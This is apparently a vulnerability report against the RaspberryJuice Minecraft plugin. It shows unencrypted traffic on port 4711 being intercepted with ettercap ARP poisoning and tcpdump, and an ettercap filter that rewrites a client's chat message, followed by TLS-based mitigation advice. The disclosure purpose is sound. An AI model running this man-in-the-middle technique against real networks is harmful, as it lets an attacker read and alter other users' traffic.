When a client wants to connect to RaspberryJuice, all traffic seems available on the network in plain text. Furthermore, the data sent by the client can be manipulated and resend back to the server while still appearing to be coming from the client:

This bug seems affecting the current and all previous versions of RaspberryJuice and spigot

Reproduce the issue with a server running spigot/RaspberryJuice listening on 4711 and client on the same network with python3 and mcpi lib, here is a test script:

from mcpi.minecraft import Minecraft
mc = Minecraft.create(address="192.168.56.1")
mc.postToChat('Hello Minecraft')

On attacker box, use ettercap to run ARP poisoning, now the data is visible uncrypted, with tcpdump:

tcpdump -A -i eth1 port 4711 and host 192.168.56.110
04:05:09.845686 IP 192.168.56.110.39210 > 192.168.56.103.4711: Flags [P.], seq 1:28, ack 1, win 229, options [nop,nop,TS val 1057102917 ecr 39383616], length 27
E..O.@@[email protected].*[email protected]._@.............
[email protected](Hello Minecraft)

To manipulate the data, load to ettercap the following filter compiled with "etterfilter fil.ecf -o fil.ef": 
 

if (ip.proto == TCP && tcp.dst == 4711 && search(DATA.data, "Hello Minecraft") ) {
 log(DATA.data,"/tmp/mispelled_ettercap.log"); 
 replace("Hello Minecraft","Message Hacked!"); 
 msg("Altered Client Message\n"); 
}

Resend the message by the client, and the message now will be altered:

04:10:37.084001 IP 192.168.56.110.39212 > 192.168.56.103.4711: Flags [P.], seq 1:28, ack 1, win 229, options [nop,nop,TS val 1057429973 ecr 39710674], length 27
E..O=u@[email protected].,.g9b"................
?....]..chat.post(Message Hacked!)

 
Suggestions to prevent this:
I haven't tested on the other plugins to confirm but the options to protect this with encrypted/authenticated channel is possible from spigot and/or the plugin level, by using TLS for authentication, and a cipher like RSA, DH, ECDH for keys exchanges.